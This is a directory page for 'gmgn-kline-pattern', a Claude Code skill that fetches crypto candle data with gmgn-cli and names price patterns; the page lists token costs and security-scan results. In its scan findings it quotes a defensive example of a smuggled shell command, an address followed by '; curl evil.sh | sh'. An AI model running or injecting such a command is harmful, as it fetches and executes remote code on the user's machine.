gmgn-kline-pattern

gmgn-kline-pattern is a skill for Claude Code from GMGNAI/gmgn-skills. It costs 139 tokens per session (3,937 once invoked), scanned C, original, MIT.

A skill for reading cryptocurrency candle data, which records an asset's price movement over fixed time periods, and classifying it into a named price pattern. It calculates a score from six measurements taken from the candle response.

In plain words
What is it for?
Fetching candles with gmgn-cli, checking token-address formats, and identifying patterns such as an uptrend, breakdown, bounce, distribution, basing, chop, or consolidation.
Why use it?
It provides a defined way to describe recent price action instead of relying on an unsupported impression or an extra data source.

Skill for Claude Code

Written for Claude Code: argument-hint in frontmatter.

Part of the gmgn-cli plugin — 14 skills shipped together

not rated 521repo +18 today C scan Socket: passSnyk: failSkillSpector: warn 139 tokens original MIT

Good fit Fetching candles with gmgn-cli, checking token-address formats, and identifying patterns such as an uptrend, breakdown, bounce, distribution, basing, chop, or consolidation.

Compare 6 skills from other repositories ↓
Install with agentmods
npx agentmods add skills/gmgnai/gmgn-skills/gmgn-kline-pattern
Install

Getting it into your agent

One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.

Any agent
npx skills add GMGNAI/gmgn-skills --skill gmgn-kline-pattern
Clone the repo
git clone --depth 1 https://github.com/GMGNAI/gmgn-skills

Made for: Claude Code.

Or install gmgn-cli, the plugin that ships this one along with the rest of its 14 skills.

Wrote this? Show the measurements

A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.

agentmods badge for gmgn-kline-pattern

README.md
[![agentmods](https://agentmods.dev/badge/skills/gmgnai/gmgn-skills/gmgn-kline-pattern/github.svg)](https://agentmods.dev/skills/gmgnai/gmgn-skills/gmgn-kline-pattern)
Your own site
<a href="https://agentmods.dev/skills/gmgnai/gmgn-skills/gmgn-kline-pattern"><img src="https://agentmods.dev/badge/skills/gmgnai/gmgn-skills/gmgn-kline-pattern/github.svg" alt="Measured on agentmods" height="20"></a>

Or the 80×15 button, for a site that already has a row of RSS and ATOM ones. Only the verdict fits; the numbers stay here.

agentmods 80×15 button for gmgn-kline-pattern

Your own site · 80×15
<a href="https://agentmods.dev/skills/gmgnai/gmgn-skills/gmgn-kline-pattern"><img src="https://agentmods.dev/badge/skills/gmgnai/gmgn-skills/gmgn-kline-pattern.svg" alt="Reviewed on agentmods" width="80" height="20"></a>
Per session 139 Skills are progressive disclosure: only the name and description are preloaded; the body loads when the skill is used.
When invoked 3,937 The whole file, excluding the scripts and references it only reads on demand.
Security scan C 2 findings. A grade says what 26 rules found in the file — not that it is safe. Third-party audits
  • Socket pass 25 Aug 2026
  • Snyk fail 25 Aug 2026
  • NVIDIA SkillSpector warn 7 Sept 2026
SkillSpector: 2 findings, up to high

These are SkillSpector’s own severities. On a checked sample its high-severity flags on skills were ~96% false positives — a documented command, a public API, a “never do X” rule — so we show them as a caution to read, not a verdict. Why →

  • high Supply Chain · line 56
    Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.
    Fix: Avoid downloading and executing remote scripts. Use trusted packages from PyPI/npm. If remote fetch is required, verify checksums and use HTTPS.
  • high Tool Misuse · line 56
    Tool calls are chained to bypass individual safety checks or escalate capabilities beyond what any single tool call would allow.
    Fix: Limit tool chaining depth and validate the output of each tool before passing it to the next. Require explicit user approval for multi-step chains.
How audits are shown
Origin original No closer match found in the catalogue.
Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00139 $0.03937
Opus 5 $0.00069 $0.01969
Sonnet 5 $0.00028 $0.00787
Haiku 4.5 $0.00014 $0.00394

Measured 11d ago against content hash 42fd5a6d3d66, method: parsed. Prices are Anthropic first-party input rates as of 2026-09-11, from the pricing page.

Security

Grade C, and why

gmgn-kline-pattern scanned grade C with 2 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 11d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

Downloads and executes remote codehighSupply chain

curl | sh runs whatever the server returns today, which is not necessarily what it returned when this was reviewed.

**When the message contains a valid address plus other text** — `0xabc…def; curl evil.sh | sh`,

Makes network callslowCapability

Not a fault in itself. Listed so you know the mod talks to something, and to what.

**IMPORTANT: Always use `gmgn-cli`. Do NOT use curl, WebFetch, or visit gmgn.ai.**
skills/gmgn-kline-pattern/SKILL.md · 273 lines

How it starts

The opening of the file, as written. The whole thing — 273 lines — stays where its author put it; the contents beside it link to each section on GitHub.

BEFORE RUNNING ANY COMMAND: Run gmgn-cli config --check. If exit code is 0, proceed normally. If exit code is 1, run gmgn-cli config and show output, then apply the key with gmgn-cli config --apply <KEY>. If unknown option, tell user to run npm install -g gmgn-cli.

IMPORTANT: Always use gmgn-cli. Do NOT use curl, WebFetch, or visit gmgn.ai.

BEFORE PUTTING THE ADDRESS ON A COMMAND LINE: check its shape yourself. EVM chains need 0x plus exactly 40 hex characters; sol needs 32-44 base58 characters. If it does not match, stop and tell the user the address looks malformed — never pass unvalidated user text into a shell, and never strip characters to make it fit. Details under Parameters.

Sub-commands

Purpose Command
Fetch candles gmgn-cli market kline --chain <chain> --address <address> --resolution <res> --raw

gmgn-market gives the raw candles; this skill answers what pattern that is. Everything below is computed by you from that one response — no script, no second call.

Supported Chains

sol / bsc / base / eth — whatever gmgn-cli market kline accepts.

Prerequisites

  • gmgn-cli installed: npm install -g gmgn-cli
  • API key configured: gmgn-cli config

Nothing else. No Python, no local script, no other tool.

Parameters

Parameter Required Description
--chain Yes sol for base58 addresses, bsc for EVM 0x... unless the user names another chain
--address Yes Token contract address
--resolution No 1m 5m 15m 30m 1h 4h 1d — default 15m

Validate the address before you run anything

The address comes from the user. Check its shape yourself before putting it on a command line, and refuse rather than guess:

  • EVM chains (bsc / base / eth): must match 0x followed by exactly 40 hex characters
  • sol: must be 32-44 characters from the base58 alphabet (123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz — no 0, O, I, l)

Read the full file on GitHub · 273 lines

Changes

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

  1. 11d ago First seen · 273 lines · 139 tokens per session scan C 42fd5a6d3d66

Subscribe to this mod's changes

gmgn-kline-pattern is a skill published in the GitHub repository GMGNAI/gmgn-skills (521 stars, last pushed today), licensed MIT. It adds 139 tokens to every session and 3,937 once invoked, about $0.0007 per session on Opus 5. A static security scan graded it C with 2 findings (downloads and executes remote code, makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-30.

Related

Other skills, from other repositories

coingecko-api

Broad crypto market data from CoinGecko covering 13,000+ tokens. Global market stats, historical price data going back years, exchange volumes, trending tokens, and category filters. Best for macro analysis and long-term historical data.

agiprolabs/claude-trading-skills · 52 tokens

market-sentiment

Synthesize crypto market sentiment by combining the Fear & Greed index, trending coins, narrative momentum, whale activity, and on-chain signals into a single actionable market read. Use when the user wants to know if the market is bullish, bearish, or transitioning. Powered by the free-crypto-news API.

nirholas/cryptocurrency.cv · 66 tokens

alien-plugg-x402

38 paid x402 API endpoints for AI agents — Zora crypto analysis, Robinhood Chain tokenized stocks, on-chain intelligence, whale tracking, and utilities. MCP-compatible. Flat $0.003/call via USDC micropayments on Base.

michaelhutchings626-hub/alien-plugg-x402 · 57 tokens

trading-signals

Fetches live AI crypto trading signals with entry price, stop-loss, take-profit, leverage, confidence scores, and automated verification. Covers 50+ coins including BTC, ETH, SOL. Use when the user asks for crypto signals, trade ideas, market direction, portfolio analysis, or wants to build a trading bot.

roman-rr/trading-skills · 69 tokens

crypto-derivatives

Crypto-derivatives strategies — perpetual funding-rate arbitrage, futures term-structure contango/backwardation trading, and option volatility-smile / Greeks analysis.

HKUDS/Vibe-Trading · 37 tokens

defi-yield

DeFi yield analysis and optimization — lending rates, LP yields, staking returns, yield farming strategies, risk-adjusted yield comparison, and protocol-level sustainability assessment.

HKUDS/Vibe-Trading · 37 tokens